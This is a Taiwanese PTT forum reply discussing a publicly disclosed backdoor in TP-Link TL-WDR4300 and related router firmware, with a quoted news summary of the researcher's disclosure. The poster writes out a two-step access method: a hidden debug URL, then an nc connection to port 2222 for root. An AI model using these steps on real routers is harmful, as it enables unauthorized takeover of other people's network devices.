Re: [情報] TP-Link 路由器發現後門
難怪美國的資訊採購堅持不用 華為設備
但我們三大電信採購買了很多... 真有種
後門進入方式
先http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
再nc 192.168.0.1 2222
獲取TP-Link最高權限。
※ 引述《YuiFAN (半熟魷魚)》之銘言:
: http://www.solidot.org/story?sid=33846
: 安全研究員 Michal Sajdak 在深圳普聯技術有限公司(TP-LINK)的路由器產品
: TL-WDR4300 的韌體中發現了後門漏洞,在通知普聯無果後,公開了漏洞的概念
: 驗證攻擊代碼。
: 受影響的型號包括 TL-WDR4300 和 TL-WR743ND (v1.2 / v2.0) 等,包含遠程
: root 漏洞的韌體版本是去年底發佈的最新版本 3.13.23 Build 122512
: (即2012年12月25日發佈的版本)。Sajdak於 2月12日和22日兩次向普聯發去了
: 詳細介紹漏洞的郵件,都沒有得到任何回應,於是在3月12日公開了漏洞。
: 此漏洞的詳細說明網頁:
: http://sekurak.pl/tp-link-httptftp-backdoor/
--
※ 發信站: 批踢踢實業坊(ptt.cc)
※ 編輯: Obb 來自: 182.18.223.9 (03/16 14:42)
推
03/16 20:18, , 1F
03/16 20:18, 1F
推
03/16 21:57, , 2F
03/16 21:57, 2F
→
03/16 23:45, , 3F
03/16 23:45, 3F
→
03/17 13:11, , 4F
03/17 13:11, 4F
→
03/17 13:11, , 5F
03/17 13:11, 5F
→
03/17 13:14, , 6F
03/17 13:14, 6F
推
03/17 15:38, , 7F
03/17 15:38, 7F
推
03/17 20:14, , 8F
03/17 20:14, 8F
推
03/17 20:16, , 9F
03/17 20:16, 9F
→
03/18 01:17, , 10F
03/18 01:17, 10F
→
03/18 01:17, , 11F
03/18 01:17, 11F
→
03/19 13:06, , 12F
03/19 13:06, 12F
討論串 (同標題文章)
本文引述了以下文章的的內容:
完整討論串 (本文為第 2 之 6 篇):
Broad_Band 近期熱門文章
PTT數位生活區 即時熱門文章
